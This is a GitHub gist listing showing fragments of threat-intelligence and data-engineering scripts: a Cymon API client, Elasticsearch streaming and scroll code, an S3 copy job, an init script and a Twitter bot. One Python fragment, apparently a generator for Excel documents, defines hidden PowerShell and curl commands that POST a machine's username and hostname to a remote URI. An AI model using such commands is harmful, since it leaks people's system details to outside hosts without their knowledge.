Roy Firestein r0yfire
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -XPOST https://api.cymon.io/v2/auth/login -H 'Content-Type: application/json' -d '{"username": "user", "password": "pass"}' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import string | |
| import random | |
| type = "excel" | |
| commands = { | |
| "win32": "PowerShell.exe -nop $postParams=@{username=$env:username;hostname=$env:computername};Invoke-WebRequest -Method POST -Body $postParams -Uri ", | |
| "win64": "PowerShell.exe -nop $postParams=@{username=$env:username;hostname=$env:computername};Invoke-WebRequest -Method POST -Body $postParams -Uri ", | |
| "mac": "curl -F username=$(whoami) -F hostname=$(hostname) -XPOST " |
r0yfire
/ cymon_example.py
Created
July 13, 2017 16:01
Example client for version 2 of the Cymon.io API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from datetime import datetime | |
| import base64 | |
| import json | |
| import requests | |
| class Cymon(object): | |
| def __init__(self, username, password, endpoint='https://api.cymon.io/v2'): | |
| self.endpoint = endpoint | |
| self.creds = {'username': username, 'password': password} | |
| self.token = None |
r0yfire
/ stream_es_to_cymon_bulk.js
Created
June 10, 2017 17:58
Stream threat reports from Elasticsearch to Cymon's Bulk Submit API using Async/Await in Node.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "use strict"; | |
| const elasticsearch = require('elasticsearch'); | |
| const ElasticsearchScrollStream = require('elasticsearch-scroll-stream'); | |
| const request = require('request-promise'); | |
| const moment = require('moment'); | |
| // change these values | |
| const USER = 'username'; | |
| const PASS = 'password'; |
r0yfire
/ stream_es_to_cymon.js
Last active
June 10, 2017 13:20
Stream Elasticsearch to Cymon API using Node8 with Async/Await
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "use strict"; | |
| const elasticsearch = require('elasticsearch'); | |
| const ElasticsearchScrollStream = require('elasticsearch-scroll-stream'); | |
| const request = require('request-promise'); | |
| const moment = require('moment'); | |
| // update these values | |
| const USER = 'username'; | |
| const PASS = 'password'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const LineByLineReader = require('line-by-line'); | |
| // | |
| // Read bulk whois data from file | |
| // | |
| const reader = new LineByLineReader('whois_dump.txt'); | |
| let whoisdata = { | |
| 'organization': [], | |
| 'inetnum': [], |
r0yfire
/ gist:d82f4f0a1b604db3b05e8f9e346a6459
Created
March 29, 2017 19:18
Massively parallel copy S3 bucket using pyspark.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from operator import add | |
| import concurrent | |
| from concurrent.futures import ThreadPoolExecutor | |
| from boto.s3.connection import S3Connection | |
| from pyspark import SparkContext | |
| def computeTargets(bucketName, prefix=""): | |
| s3 = S3Connection() |
r0yfire
/ elasticsearch_scroll.py
Created
June 28, 2016 16:55
Elasticsearch Scroll API Example in Python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import boto3 | |
| import requests | |
| from aws_requests_auth.aws_auth import AWSRequestsAuth | |
| profile_name = "default" | |
| endpoint = "search-host-example.us-east-1.es.amazonaws.com" | |
| region = "us-east-1" | |
| session = boto3.session.Session(region_name=region, profile_name=profile_name) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # /etc/rc.d/init.d/supervisord | |
| # | |
| # Supervisor is a client/server system that | |
| # allows its users to monitor and control a | |
| # number of processes on UNIX-like operating | |
| # systems. | |
| # | |
| # chkconfig: - 64 36 |
r0yfire
/ cymon_twitter_robot.js
Created
October 14, 2015 14:12
Twitter robot for @cymonbot to run on Google Script platform
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** A S I M P L E T W I T T E R B O T **/ | |
| /** ======================================= **/ | |
| // Config |